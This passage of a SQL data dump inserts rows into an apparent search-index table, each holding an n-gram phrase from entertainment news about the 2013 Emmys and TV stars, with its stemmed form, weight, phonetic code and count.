ok',0,1,1.3333,'M232',1,'en'),(32956,'my date','my date',0,1,1.2333,'M300',1,'en'),(32957,'my date i','my date i',0,1,1.3,'M300',1,'en'),(32958,'my wife','my wife',0,1,1.2333,'M100',1,'en'),(32959,'my wife we','my wife we',0,1,1.3333,'M100',1,'en'),(32960,'narciso','narciso',0,0,0.4667,'N620',1,'en'),(32961,'narciso rodriguez','narciso rodriguez',0,1,1.5667,'N626362',1,'en'),(32962,'narciso rodriguez dress','narciso rodriguez dress',0,1,1.7667,'N626362362',1,'en'),(32963,'nbc','nbc',0,0,0.2,'N120',1,'en'),(32964,'nbc it','nbc it',0,1,1.2,'N123',1,'en'),(32965,'nbc it was','nbc it was',0,1,1.3333,'N1232',1,'en'),(32966,'nbc never','nbc never',0,1,1.3,'N12516',1,'en'),(32967,'nbc never tried','nbc never tried',0,1,1.5,'N12516363',1,'en'),(32968,'never tried','never tried',0,1,1.3667,'N16363',1,'en'),(32969,'never tried to','never tried to',0,1,1.4667,'N16363',1,'en'),(32970,'new gym','new gym',0,1,1.2333,'N250',1,'en'),(32971,'new gym floor','new gym floor',0,1,1.4333,'N25146',1,'en'),(32972,'night and','night and',0,1,1.3,'N2353',1,'en'),(32973,'night and to','night and to',0,1,1.4,'N2353',1,'en'),(32974,'nobody','nobodi',0,0,0.4,'N130',3,'en'),(32975,'nobody else','nobodi else',0,1,1.3667,'N1342',1,'en'),(32976,'nobody else could','nobodi else could',0,1,1.5667,'N134243',1,'en'),(32977,'nominations','nomin',0,0,0.7333,'N352',1,'en'),(32978,'nominations came','nomin came',0,1,1.5333,'N3525',1,'en'),(32979,'nominations came out','nomin came out',0,1,1.6667,'N35253',1,'en'),(32980,'nominee','nomine',0,0,0.4667,'N000',1,'en'),(32981,'nominee clad','nomine clad',0,1,1.4,'N243',1,'en'),(32982,'nominee clad in','nomine clad in',0,1,1.5,'N2435',1,'en'),(32983,'not sure if','not sure if',0,1,1.3667,'N3261',1,'en'),(32984,'not that','not that',0,1,1.2667,'N300',1,'en'),(32985,'not that i','not that i',0,1,1.3333,'N300',1,'en'),(32986,'noticed this','notic this',0,1,1.4,'N3232',1,'en'),(32987,'noticed this year','notic this year',0,1,1.5667,'N32326',1,'en'),(32988,'now but','now but',0,1,1.2333,'N130',1,'en'),(32989,'now but the','now but the',0,1,1.3667,'N130',1,'en'),(32990,'numbers of it','number of it',0,1,1.4333,'N16213',1,'en'),(32991,'nurture','nurtur',0,0,0.4667,'N636',1,'en'),(32992,'nurture other','nurtur other',0,1,1.4333,'N63636',1,'en'),(32993,'nurture other love','nurtur other love',0,1,1.6,'N6363641',1,'en'),(32994,'of affection','of affection',0,1,1.4,'O1235',1,'en'),(32995,'of affection and','of affection and',0,1,1.5333,'O12353',1,'en'),(32996,'of america','of america',0,1,1.3333,'O1562',1,'en'),(32997,'of america todaymichael','of america todaymichael',0,1,1.7667,'O15623524',1,'en'),(32998,'of america todaytina','of america todaytina',0,1,1.6667,'O156235',1,'en'),(32999,'of baby','of baby',0,1,1.2333,'O100',1,'en'),(33000,'of baby baccarin','of baby baccarin',0,1,1.5333,'O1265',1,'en'),(33001,'of cards\'','of cards',0,1,1.3,'O12632',1,'en'),(33002,'of cards\' extremely','of cards extremely',0,1,1.6333,'O126323654',1,'en'),(33003,'of don','of don',0,1,1.2,'O135',1,'en'),(33004,'of don cheadle','of don cheadle',0,1,1.4667,'O135234',1,'en'),(33005,'of fear','of fear',0,1,1.2333,'O160',1,'en'),(33006,'of fear john','of fear john',0,1,1.4,'O1625',1,'en'),(33007,'of gratitude','of gratitude',0,1,1.4,'O1263',1,'en'),(33008,'of gratitude just','of gratitude just',0,1,1.5667,'O126323',1,'en'),(33009,'of it','of it',0,1,1.1667,'O130',1,'en'),(33010,'of it i\'m','of it i',0,1,1.3,'O135',1,'en'),(33011,'of our young','of our young',0,1,1.4,'O1652',1,'en'),(33012,'of show\'s','of show',0,1,1.3,'O120',1,'en'),(33013,'of show\'s first','of show first',0,1,1.5,'O121623',1,'en'),(33014,'of the show','of the show',0,1,1.3667,'O132',1,'en'),(33015,'offer a','offer a',0,1,1.2333,'O160',1,'en'),(33016,'offer a direct','offer a direct',0,1,1.4667,'O163623',1,'en'),(33017,'offered','offer',0,0,0.4667,'O163',1,'en'),(33018,'offered to','offer to',0,1,1.3333,'O163',1,'en'),(33019,'offered to me','offer to me',0,1,1.4333,'O1635',1,'en'),(33020,'ok he\'s','ok he',0,1,1.2333,'O200',1,'en'),(33021,'ok he\'s happy','ok he happy',0,1,1.4333,'O210',1,'en'),(33022,'olivia','olivia',0,0,0.4,'O410',1,'en'),(33023,'olivia pope','olivia pope',0,1,1.3667,'O410',1,'en'),(33024,'olivia pope and','olivia pope and',0,1,1.5,'O4153',1,'en'),(33025,'on a narciso','on a narciso',0,1,1.4,'O562',1,'en'),(33026,'on a silver','on a silver',0,1,1.3667,'O52416',1,'en'),(33027,'on hand','on hand',0,1,1.2333,'O530',1,'en'),(33028,'on hand arrives','on hand arrives',0,1,1.5,'O53612',1,'en'),(33029,'on nbc','on nbc',0,1,1.2,'O512',1,'en'),(33030,'on nbc it','on nbc it',0,1,1.3,'O5123',1,'en'),(33031,'on the scene','on the scene',0,1,1.4,'O5325',1,'en'),(33032,'only gratitude','onli gratitude',0,1,1.4667,'O54263',1,'en'),(33033,'only gratitude for','onli gratitude for',0,1,1.6,'O5426316',1,'en'),(33034,'or movie','or movie',0,1,1.2667,'O651',1,'en'),(33035,'or movie winner','or movie winner',0,1,1.5,'O65156',1,'en'),(33036,'other love','other love',0,1,1.3333,'O3641',1,'en'),(33037,'other love affairs','other love affairs',0,1,1.6,'O364162',1,'en'),(33038,'our friends','our friends',0,1,1.3667,'O616532',1,'en'),(33039,'our friends at','our friends at',0,1,1.4667,'O6165323',1,'en'),(33040,'our young','our young',0,1,1.3,'O652',2,'en'),(33041,'our young child','our young child',0,1,1.5,'O65243',1,'en'),(33042,'out i','out i',0,1,1.1667,'O300',1,'en'),(33043,'out i was','out i was',0,1,1.3,'O320',1,'en'),(33044,'overall for','overal for',0,1,1.3667,'O16416',1,'en'),(33045,'overall for 2013.kerry','overal for 2013.kerry',0,1,1.7333,'O1641626',1,'en'),(33046,'owing','ow',0,0,0.3333,'O520',1,'en'),(33047,'owing to','ow to',0,1,1.2667,'O523',1,'en'),(33048,'owing to co','ow to co',0,1,1.3667,'O5232',1,'en'),(33049,'owner','owner',0,0,0.3333,'O560',3,'en'),(33050,'owner had','owner had',0,1,1.3,'O563',1,'en'),(33051,'owner had babies','owner had babies',0,1,1.5333,'O56312',1,'en'),(33052,'pages 4','page 4',0,1,1.2333,'P200',1,'en'),(33053,'parsons','parson',0,0,0.4667,'P6252',1,'en'),(33054,'parsons the','parson the',0,1,1.3667,'P62523',1,'en'),(33055,'parsons the \'big','parson the big',0,1,1.5333,'P6252312',1,'en'),(33056,'patinkin','patinkin',0,0,0.5333,'P3525',1,'en'),(33057,'patinkin at','patinkin at',0,1,1.3667,'P35253',1,'en'),(33058,'patinkin at the','patinkin at the',0,1,1.5,'P35253',1,'en'),(33059,'patinkin on','patinkin on',0,1,1.3667,'P3525',1,'en'),(33060,'patinkin on hand','patinkin on hand',0,1,1.5333,'P35253',1,'en'),(33061,'pay attention','pai attention',0,1,1.4333,'P3535',1,'en'),(33062,'pay attention means','pai attention means',0,1,1.6333,'P35352',1,'en'),(33063,'people i\'ve','peopl i',0,1,1.3667,'P410',1,'en'),(33064,'people i\'ve known','peopl i known',0,1,1.5667,'P4125',1,'en'),(33065,'person at','person at',0,1,1.3,'P6253',1,'en'),(33066,'person at putting','person at putting',0,1,1.5667,'P62531352',1,'en'),(33067,'picked','pick',0,0,0.4,'P230',2,'en'),(33068,'picked up','pick up',0,1,1.3,'P231',1,'en'),(33069,'picked up an','pick up an',0,1,1.4,'P2315',1,'en'),(33070,'placing','place',0,0,0.4667,'P4252',1,'en'),(33071,'placing on','place on',0,1,1.3333,'P42525',1,'en'),(33072,'placing on a','place on a',0,1,1.4,'P42525',1,'en'),(33073,'platter','platter',0,0,0.4667,'P436',1,'en'),(33074,'platter following','platter following',0,1,1.5667,'P4361452',1,'en'),(33075,'platter following about','platter following about',0,1,1.7667,'P436145213',1,'en'),(33076,'political','polit',0,0,0.6,'P4324',1,'en'),(33077,'political duel','polit duel',0,1,1.4667,'P432434',1,'en'),(33078,'political duel between','polit duel between',0,1,1.7333,'P432434135',1,'en'),(33079,'pollan','pollan',0,0,0.4,'P450',1,'en'),(33080,'pollan it\'s','pollan it',0,1,1.3667,'P4532',1,'en'),(33081,'pollan it\'s fun','pollan it fun',0,1,1.5,'P453215',1,'en'),(33082,'pope','pope',0,0,0.2667,'P000',1,'en'),(33083,'pope and','pope and',0,1,1.2667,'P530',1,'en'),(33084,'pope and francis','pope and francis',0,1,1.5333,'P531652',1,'en'),(33085,'possessing','possess',0,0,0.6667,'P252',1,'en'),(33086,'possessing project','possess project',0,1,1.6,'P2521623',1,'en'),(33087,'possessing project offered','possess project offered',0,1,1.8667,'P2521623163',1,'en'),(33088,'preferred gallery','prefer gallery',0,1,1.5667,'P6163246',1,'en'),(33089,'preferred gallery and','prefer gallery and',0,1,1.7,'P616324653',1,'en'),(33090,'produced','produc',0,0,0.5333,'P6323',3,'en'),(33091,'produced the','produc the',0,1,1.4,'P6323',1,'en'),(33092,'produced the life','produc the life',0,1,1.5667,'P632341',1,'en'),(33093,'project offered','project offered',0,1,1.5,'P623163',1,'en'),(33094,'project offered to','project offered to',0,1,1.6,'P623163',1,'en'),(33095,'putting children','put children',0,1,1.5333,'P3524365',1,'en'),(33096,'putting children to','put children to',0,1,1.6333,'P35243653',1,'en'),(33097,'quoted saying backstage','quot saying backstage',0,1,1.7667,'Q32521232',1,'en'),(33098,'reach','reach',0,0,0.3333,'R200',1,'en'),(33099,'reach the','reach the',0,1,1.3,'R230',1,'en'),(33100,'reach the 2013','reach the 2013',0,1,1.4667,'R230',1,'en'),(33101,'really amazed','realli amazed',0,1,1.4333,'R4523',1,'en'),(33102,'really amazed me','realli amazed me',0,1,1.5333,'R45235',1,'en'),(33103,'really touching','realli touching',0,1,1.5,'R43252',1,'en'),(33104,'really touching dan','realli touching dan',0,1,1.6333,'R4325235',1,'en'),(33105,'reasons unknown this','reason unknown this',0,1,1.6667,'R25252532',1,'en'),(33106,'red carpet','red carpet',0,1,1.3333,'R32613',1,'en'),(33107,'red carpet event','red carpet event',0,1,1.5333,'R32613153',1,'en'),(33108,'red new','red new',0,1,1.2333,'R350',1,'en'),(33109,'red new gym','red new gym',0,1,1.3667,'R3525',1,'en'),(33110,'remaining','remain',0,0,0.6,'R520',3,'en'),(33111,'remaining luciana','remain luciana',0,1,1.5667,'R52425',1,'en'),(33112,'remaining luciana barroso','remain luciana barroso',0,1,1.8333,'R52425162',1,'en'),(33113,'returns to','return to',0,1,1.3333,'R36523',2,'en'),(33114,'returns to tv','return to tv',0,1,1.4333,'R365231',1,'en'),(33115,'reverse','revers',0,0,0.4667,'R162',1,'en'),(33116,'reverse john','revers john',0,1,1.4,'R1625',1,'en'),(33117,'reverse john macmeserta','revers john macmeserta',0,1,1.7667,'R162525263',1,'en'),(33118,'rock\'','rock',0,0,0.3333,'R200',1,'en'),(33119,'rock\' and','rock and',0,1,1.3,'R253',1,'en'),(33120,'rock\' and said','rock and said',0,1,1.4667,'R25323',1,'en'),(33121,'rocked','rock',0,0,0.4,'R230',1,'en'),(33122,'rocked claire\'s','rock claire',0,1,1.5,'R232462',1,'en'),(33123,'rocked claire\'s baby','rock claire baby',0,1,1.6667,'R2324621',1,'en'),(33124,'rodriguez dress','rodriguez dress',0,1,1.5,'R362362',1,'en'),(33125,'rodriguez dress roger','rodriguez dress roger',0,1,1.7,'R362362626',1,'en'),(33126,'roger','roger',0,0,0.3333,'R260',1,'en'),(33127,'roger vivier','roger vivier',0,1,1.4,'R2616',1,'en'),(33128,'roger vivier heels','roger vivier heels',0,1,1.6,'R261642',1,'en'),(33129,'said backstage','said backstage',0,1,1.4667,'S31232',1,'en'),(33130,'said backstage that','said backstage that',0,1,1.6333,'S312323',1,'en'),(33131,'saying backstage','sai backstage',0,1,1.5333,'S521232',1,'en'),(33132,'saying backstage after','sai backstage after',0,1,1.7333,'S521232136',1,'en'),(33133,'says life','sai life',0,1,1.3,'S410',1,'en'),(33134,'says life after','sai life after',0,1,1.5,'S4136',1,'en'),(33135,'says the','sai the',0,1,1.2667,'S300',2,'en'),(33136,'says the set','sai the set',0,1,1.4,'S323',1,'en'),(33137,'scene','scene',0,0,0.3333,'S500',1,'en'),(33138,'scene again','scene again',0,1,1.3667,'S525',1,'en'),(33139,'scene again to','scene again to',0,1,1.4667,'S5253',1,'en'),(33140,'season','season',0,0,0.4,'S500',3,'en'),(33141,'season i','season i',0,1,1.2667,'S500',1,'en'),(33142,'season i just','season i just',0,1,1.4333,'S523',1,'en'),(33143,'second most','second most',0,1,1.3667,'S53523',1,'en'),(33144,'second most preferred','second most preferred',0,1,1.7,'S5352316163',1,'en'),(33145,'sections','section',0,0,0.5333,'S352',1,'en'),(33146,'sections cheap','section cheap',0,1,1.4667,'S3521',1,'en'),(33147,'sections cheap ralph','section cheap ralph',0,1,1.6667,'S3521641',1,'en'),(33148,'see something','see something',0,1,1.4333,'S5352',1,'en'),(33149,'see something which','see something which',0,1,1.6333,'S5352',1,'en'),(33150,'sense','sens',0,0,0.3333,'S520',2,'en'),(33151,'sense of','sens of',0,1,1.2667,'S521',2,'en'),(33152,'sense of gratitude','sens of gratitude',0,1,1.6,'S521263',1,'en'),(33153,'series \'30','seri 30',0,1,1.3333,'S620',1,'en'),(33154,'series \'30 rock\'','seri 30 rock',0,1,1.5333,'S6262',1,'en'),(33155,'set has','set has',0,1,1.2333,'S320',1,'en'),(33156,'set has turned','set has turned',0,1,1.4667,'S323653',1,'en'),(33157,'set is','set is',0,1,1.2,'S320',1,'en'),(33158,'set is in','set is in',0,1,1.3,'S325',1,'en'),(33159,'set of fear','set of fear',0,1,1.3667,'S316',1,'en'),(33160,'seventh','seventh',0,0,0.4667,'S153',1,'en'),(33161,'seventh season','seventh season',0,1,1.4667,'S15325',1,'en'),(33162,'seventh season i','seventh season i',0,1,1.5333,'S15325',1,'en'),(33163,'share data','share data',0,1,1.3333,'S630',1,'en'),(33164,'share data i','share data i',0,1,1.4,'S630',1,'en'),(33165,'she was','she was',0,1,1.2333,'S000',3,'en'),(33166,'she was thankful','she was thankful',0,1,1.5333,'S35214',1,'en'),(33167,'show fey','show fey',0,1,1.2667,'S100',1,'en'),(33168,'show fey supposed','show fey supposed',0,1,1.5667,'S12123',1,'en'),(33169,'show is','show is',0,1,1.2333,'S000',1,'en'),(33170,'show is going','show is going',0,1,1.4333,'S520',1,'en'),(33171,'show\'s','show',0,0,0.4,'S000',1,'en'),(33172,'show\'s first','show first',0,1,1.4,'S1623',1,'en'),(33173,'show\'s first owner','show first owner',0,1,1.6,'S162356',1,'en'),(33174,'silver platter','silver platter',0,1,1.4667,'S4161436',1,'en'),(33175,'silver platter following','silver platter following',0,1,1.8,'S41614361452',1,'en'),(33176,'since the type','sinc the type',0,1,1.4667,'S5231',1,'en'),(33177,'sleep','sleep',0,0,0.3333,'S410',1,'en'),(33178,'sleep i','sleep i',0,1,1.2333,'S410',1,'en'),(33179,'sleep i rocked','sleep i rocked',0,1,1.4667,'S41623',1,'en'),(33180,'sleep when','sleep when',0,1,1.3333,'S415',1,'en'),(33181,'sleep when nobody','sleep when nobody',0,1,1.5667,'S41513',1,'en'),(33182,'so fleeting','so fleeting',0,1,1.3667,'S14352',1,'en'),(33183,'so fleeting and','so fleeting and',0,1,1.5,'S1435253',1,'en'),(33184,'something which','someth which',0,1,1.5,'S5352',1,'en'),(33185,'something which makes','someth which makes',0,1,1.7,'S535252',1,'en'),(33186,'spacey','spacei',0,0,0.4,'S120',1,'en'),(33187,'spacey a','spacei a',0,1,1.2667,'S120',1,'en'),(33188,'spacey a unique','spacei a unique',0,1,1.5,'S1252',1,'en'),(33189,'spending','spend',0,0,0.5333,'S15352',1,'en'),(33190,'spending budget','spend budget',0,1,1.5,'S153521323',1,'en'),(33191,'spending budget management','spend budget management',0,1,1.8667,'S1535213235253',1,'en'),(33192,'star and','star and',0,1,1.2667,'S3653',1,'en'),(33193,'star and a','star and a',0,1,1.3333,'S3653',1,'en'),(33194,'star and lead','star and lead',0,1,1.4333,'S365343',1,'en'),(33195,'star morena','star morena',0,1,1.3667,'S36565',1,'en'),(33196,'star morena baccarin','star morena baccarin',0,1,1.6667,'S365651265',1,'en'),(33197,'star says','star says',0,1,1.3,'S362',1,'en'),(33198,'star says the','star says the',0,1,1.4333,'S3623',1,'en'),(33199,'states','state',0,0,0.4,'S320',2,'en'),(33200,'states of','state of',0,1,1.3,'S321',1,'en'),(33201,'states of america','state of america',0,1,1.5667,'S321562',1,'en'),(33202,'struck','struck',0,0,0.4,'S362',1,'en'),(33203,'struck with','struck with',0,1,1.3667,'S3623',1,'en'),(33204,'struck with a','struck with a',0,1,1.4333,'S3623',1,'en'),(33205,'style from','style from',0,1,1.3333,'S34165',1,'en'),(33206,'style from \'house','style from house',0,1,1.5667,'S341652',1,'en'),(33207,'supposed','suppos',0,0,0.5333,'S123',1,'en'),(33208,'supposed and','suppos and',0,1,1.4,'S12353',1,'en'),(33209,'supposed and the','suppos and the',0,1,1.5333,'S12353',1,'en'),(33210,'sure if','sure if',0,1,1.2333,'S610',1,'en'),(33211,'sure if that\'s','sure if that',0,1,1.4667,'S6132',1,'en'),(33212,'surprise','surpris',0,0,0.5333,'S6162',1,'en'),(33213,'surprise this','surpris this',0,1,1.4333,'S616232',1,'en'),(33214,'surprise this could','surpris this could',0,1,1.6333,'S61623243',1,'en'),(33215,'taken aback','taken aback',0,1,1.3667,'T2512',1,'en'),(33216,'taken aback by','taken aback by',0,1,1.4667,'T25121',1,'en'),(33217,'taken aback i\'ve','taken aback i',0,1,1.5333,'T25121',1,'en'),(33218,'taking into','take into',0,1,1.3667,'T25253',1,'en'),(33219,'taking into account','take into account',0,1,1.6333,'T25253253',1,'en'),(33220,'team it','team it',0,1,1.2333,'T530',1,'en'),(33221,'team it will','team it will',0,1,1.4,'T534',1,'en'),(33222,'thankful','thank',0,0,0.5333,'T5214',1,'en'),(33223,'thankful for','thank for',0,1,1.4,'T521416',1,'en'),(33224,'thankful for great','thank for great',0,1,1.6,'T521416263',1,'en'),(33225,'that i ever','that i ever',0,1,1.3667,'T160',1,'en'),(33226,'that made','that made',0,1,1.3,'T530',1,'en'),(33227,'that made him','that made him',0,1,1.4333,'T535',1,'en'),(33228,'that produced','that produced',0,1,1.4333,'T16323',1,'en'),(33229,'that produced the','that produced the',0,1,1.5667,'T16323',1,'en'),(33230,'that she','that she',0,1,1.2667,'T200',1,'en'),(33231,'that she was','that she was',0,1,1.4,'T200',1,'en'),(33232,'that\'s because','that because',0,1,1.4667,'T212',1,'en'),(33233,'that\'s because the','that because the',0,1,1.6,'T2123',1,'en'),(33234,'the \'behind','the behind',0,1,1.3667,'T153',1,'en'),(33235,'the \'behind the','the behind the',0,1,1.5,'T153',1,'en'),(33236,'the \'big','the big',0,1,1.2667,'T120',1,'en'),(33237,'the \'big bang','the big bang',0,1,1.4333,'T12152',1,'en'),(33238,'the \'homeland\'','the homeland',0,1,1.4667,'T5453',1,'en'),(33239,'the \'homeland\' star','the homeland star',0,1,1.6333,'T5453236',1,'en'),(33240,'the 2013','the 2013',0,1,1.2667,'T000',1,'en'),(33241,'the 2013 emmy','the 2013 emmy',0,1,1.4333,'T500',1,'en'),(33242,'the actor','the actor',0,1,1.3,'T236',1,'en'),(33243,'the actor was','the actor was',0,1,1.4333,'T2362',1,'en'),(33244,'the appeal','the appeal',0,1,1.3333,'T140',1,'en'),(33245,'the appeal for','the appeal for',0,1,1.4667,'T1416',1,'en'),(33246,'the candelabra\'','the candelabra',0,1,1.5,'T253416',1,'en'),(33247,'the candelabra\' star','the candelabra star',0,1,1.6667,'T253416236',1,'en'),(33248,'the concept','the concept',0,1,1.3667,'T25213',2,'en'),(33249,'the concept you','the concept you',0,1,1.5,'T25213',1,'en'),(33250,'the emmy','the emmy',0,1,1.2667,'T500',1,'en'),(33251,'the emmy gifts','the emmy gifts',0,1,1.4667,'T52132',1,'en'),(33252,'the first was','the first was',0,1,1.4333,'T16232',1,'en'),(33253,'the hit','the hit',0,1,1.2333,'T000',1,'en'),(33254,'the hit comedy','the hit comedy',0,1,1.4667,'T253',1,'en'),(33255,'the homeland','the homeland',0,1,1.4,'T5453',1,'en'),(33256,'the homeland set','the homeland set',0,1,1.5333,'T545323',1,'en'),(33257,'the life','the life',0,1,1.2667,'T410',1,'en'),(33258,'the life sections','the life sections',0,1,1.5667,'T412352',1,'en'),(33259,'the most taken','the most taken',0,1,1.4667,'T52325',1,'en'),(33260,'the scene','the scene',0,1,1.3,'T250',1,'en'),(33261,'the scene again','the scene again',0,1,1.5,'T2525',1,'en'),(33262,'the set','the set',0,1,1.2333,'T230',1,'en'),(33263,'the set has','the set has',0,1,1.3667,'T232',1,'en'),(33264,'the show','the show',0,1,1.2667,'T200',1,'en'),(33265,'the show fey','the show fey',0,1,1.4,'T210',1,'en'),(33266,'the show is','the show is',0,1,1.3667,'T200',1,'en'),(33267,'the tone','the tone',0,1,1.2667,'T500',1,'en'),(33268,'the tone of','the tone of',0,1,1.3667,'T510',1,'en'),(33269,'the type','the type',0,1,1.2667,'T100',1,'en'),(33270,'the type of','the type of',0,1,1.3667,'T100',1,'en'),(33271,'the upcoming arrival','the upcoming arrival',0,1,1.6667,'T1252614',1,'en'),(33272,'the vehicle','the vehicle',0,1,1.3667,'T124',1,'en'),(33273,'the vehicle and','the vehicle and',0,1,1.5,'T12453',1,'en'),(33274,'them pay','them pay',0,1,1.2667,'T510',1,'en'),(33275,'them pay attention','them pay attention',0,1,1.6,'T513535',1,'en'),(33276,'them to','them to',0,1,1.2333,'T530',1,'en'),(33277,'them to share','them to share',0,1,1.4333,'T5326',1,'en'),(33278,'theory\'','theori',0,0,0.4667,'T600',1,'en'),(33279,'theory\' star','theori star',0,1,1.4,'T6236',1,'en'),(33280,'theory\' star and','theori star and',0,1,1.5333,'T623653',1,'en'),(33281,'there i','there i',0,1,1.2333,'T600',1,'en'),(33282,'there i noticed','there i noticed',0,1,1.5,'T65323',1,'en'),(33283,'these things','these things',0,1,1.4,'T2352',1,'en'),(33284,'these things are','these things are',0,1,1.5333,'T23526',1,'en'),(33285,'they are work','thei are work',0,1,1.4333,'T620',1,'en'),(33286,'they be','thei be',0,1,1.2333,'T100',1,'en'),(33287,'they be an','thei be an',0,1,1.3333,'T150',1,'en'),(33288,'they see','thei see',0,1,1.2667,'T200',1,'en'),(33289,'they see something','thei see something',0,1,1.6,'T25352',1,'en'),(33290,'thing about','thing about',0,1,1.3667,'T5213',1,'en'),(33291,'thing about this','thing about this',0,1,1.5333,'T52132',1,'en'),(33292,'things are','thing are',0,1,1.3333,'T526',1,'en'),(33293,'things are so','thing are so',0,1,1.4333,'T5262',1,'en'),(33294,'things happened','thing happened',0,1,1.5,'T52153',1,'en'),(33295,'things happened after','thing happened after',0,1,1.7,'T52153136',1,'en'),(33296,'think hardcore','think hardcore',0,1,1.4667,'T526326',1,'en'),(33297,'think hardcore comedy','think hardcore comedy',0,1,1.7,'T526326253',1,'en'),(33298,'think they','think they',0,1,1.3333,'T523',1,'en'),(33299,'think they be','think they be',0,1,1.4333,'T5231',1,'en'),(33300,'this could','thi could',0,1,1.3333,'T243',1,'en'),(33301,'this could be','thi could be',0,1,1.4333,'T2431',1,'en'),(33302,'this is the','thi is the',0,1,1.3667,'T230',3,'en'),(33303,'this just','thi just',0,1,1.3,'T230',1,'en'),(33304,'this just hit','thi just hit',0,1,1.4333,'T230',1,'en'),(33305,'this kind','thi kind',0,1,1.3,'T253',1,'en'),(33306,'this kind of','thi kind of',0,1,1.4,'T2531',1,'en'),(33307,'this night','thi night',0,1,1.3333,'T2523',1,'en'),(33308,'this night and','thi night and',0,1,1.4667,'T252353',1,'en'),(33309,'this year','thi year',0,1,1.3,'T260',1,'en'),(33310,'this year greater','thi year greater',0,1,1.5667,'T262636',1,'en'),(33311,'this year spending','thi year spending',0,1,1.6,'T26215352',1,'en'),(33312,'thought surprise','thought surprise',0,1,1.5333,'T2326162',1,'en'),(33313,'thought surprise this','thought surprise this',0,1,1.7,'T232616232',1,'en'),(33314,'three time','three time',0,1,1.3333,'T635',1,'en'),(33315,'three time emmy','three time emmy',0,1,1.5,'T635',1,'en'),(33316,'time emmy','time emmy',0,1,1.3,'T500',1,'en'),(33317,'time emmy winner','time emmy winner',0,1,1.5333,'T560',1,'en'),(33318,'tivo','tivo',0,0,0.2667,'T100',1,'en'),(33319,'tivo it','tivo it',0,1,1.2333,'T130',1,'en'),(33320,'tivo it reverse','tivo it reverse',0,1,1.5,'T136162',1,'en'),(33321,'to actress','to actress',0,1,1.3333,'T2362',1,'en'),(33322,'to actress tracy','to actress tracy',0,1,1.5333,'T2362362',1,'en'),(33323,'to be here','to be here',0,1,1.3333,'T160',1,'en'),(33324,'to be on','to be on',0,1,1.2667,'T150',1,'en'),(33325,'to be thing','to be thing',0,1,1.3667,'T1352',1,'en'),(33326,'to change','to change',0,1,1.3,'T252',2,'en'),(33327,'to change the','to change the',0,1,1.4333,'T2523',1,'en'),(33328,'to co','to co',0,1,1.1667,'T200',1,'en'),(33329,'to co star','to co star',0,1,1.3333,'T236',1,'en'),(33330,'to come back','to come back',0,1,1.4,'T2512',1,'en'),(33331,'to everybody','to everybody',0,1,1.4,'T1613',1,'en'),(33332,'to everybody may','to everybody may',0,1,1.5333,'T16135',1,'en'),(33333,'to him','to him',0,1,1.2,'T500',1,'en'),(33334,'to him i','to him i',0,1,1.2667,'T500',1,'en'),(33335,'to me','to me',0,1,1.1667,'T500',1,'en'),(33336,'to me on','to me on',0,1,1.2667,'T500',1,'en'),(33337,'to nurture','to nurture',0,1,1.3333,'T5636',1,'en'),(33338,'to nurture other','to nurture other',0,1,1.5333,'T563636',1,'en'),(33339,'to share','to share',0,1,1.2667,'T260',1,'en'),(33340,'to share data','to share data',0,1,1.4333,'T263',1,'en'),(33341,'to sleep','to sleep',0,1,1.2667,'T241',1,'en'),(33342,'to sleep i','to sleep i',0,1,1.3333,'T241',1,'en'),(33343,'to sleep when','to sleep when',0,1,1.4333,'T2415',1,'en'),(33344,'to tv','to tv',0,1,1.1667,'T100',1,'en'),(33345,'to tv now','to tv now',0,1,1.3,'T150',1,'en'),(33346,'todayjim','todayjim',0,0,0.5333,'T250',1,'en'),(33347,'todayjim parsons','todayjim parsons',0,1,1.5333,'T2516252',1,'en'),(33348,'todayjim parsons the','todayjim parsons the',0,1,1.6667,'T25162523',1,'en'),(33349,'todaymandy','todaymandi',0,0,0.6667,'T530',1,'en'),(33350,'todaymandy patinkin','todaymandi patinkin',0,1,1.6333,'T5313525',1,'en'),(33351,'todaymandy patinkin on','todaymandi patinkin on',0,1,1.7333,'T5313525',1,'en'),(33352,'todaymichael','todaymichael',0,0,0.8,'T524',1,'en'),(33353,'todaymichael douglas','todaymichael douglas',0,1,1.6667,'T5243242',1,'en'),(33354,'todaymichael douglas remaining','todaymichael douglas remaining',0,1,2,'T5243242652',1,'en'),(33355,'todaymichael j','todaymichael j',0,1,1.4667,'T5242',1,'en'),(33356,'todaymichael j fox','todaymichael j fox',0,1,1.6,'T524212',1,'en'),(33357,'todaytina','todaytina',0,0,0.6,'T500',1,'en'),(33358,'todaytina fey','todaytina fey',0,1,1.4333,'T510',1,'en'),(33359,'todaytina fey placing','todaytina fey placing',0,1,1.7,'T514252',1,'en'),(33360,'tone','tone',0,0,0.2667,'T500',1,'en'),(33361,'tone of','tone of',0,1,1.2333,'T510',1,'en'),(33362,'tone of the','tone of the',0,1,1.3667,'T513',1,'en'),(33363,'touching','touch',0,0,0.5333,'T252',1,'en'),(33364,'touching dan','touch dan',0,1,1.4,'T25235',1,'en'),(33365,'touching dan macmedan','touch dan macmedan',0,1,1.7,'T252352535',1,'en'),(33366,'tracy','traci',0,0,0.3333,'T620',1,'en'),(33367,'tracy pollan','traci pollan',0,1,1.4,'T62145',1,'en'),(33368,'tracy pollan it\'s','traci pollan it',0,1,1.5667,'T6214532',1,'en'),(33369,'travelling','travel',0,0,0.6667,'T61452',1,'en'),(33370,'travelling to','travel to',0,1,1.4333,'T614523',1,'en'),(33371,'travelling to everybody','travel to everybody',0,1,1.7667,'T6145231613',1,'en'),(33372,'tremendous writing','tremend writing',0,1,1.6,'T65326352',1,'en'),(33373,'tremendous writing in','tremend writing in',0,1,1.7,'T653263525',1,'en'),(33374,'tried','tri',0,0,0.3333,'T630',2,'en'),(33375,'tried to','tri to',0,1,1.2667,'T630',2,'en'),(33376,'tried to change','tri to change',0,1,1.5,'T63252',1,'en'),(33377,'turned','turn',0,0,0.4,'T653',2,'en'),(33378,'turned into','turn into',0,1,1.3667,'T65353',1,'en'),(33379,'turned into baby','turn into baby',0,1,1.5333,'T653531',1,'en'),(33380,'tv now','tv now',0,1,1.2,'T150',1,'en'),(33381,'tv now but','tv now but',0,1,1.3333,'T1513',1,'en'),(33382,'two amazing','two amazing',0,1,1.3667,'T5252',1,'en'),(33383,'two amazing things','two amazing things',0,1,1.6,'T5252352',1,'en'),(33384,'type of show\'s','type of show',0,1,1.4667,'T120',1,'en'),(33385,'uk second','uk second',0,1,1.3,'U253',1,'en'),(33386,'uk second most','uk second most',0,1,1.4667,'U253523',1,'en'),(33387,'underwood','underwood',0,0,0.6,'U5363',1,'en'),(33388,'underwood kevin','underwood kevin',0,1,1.5,'U5363215',1,'en'),(33389,'underwood kevin 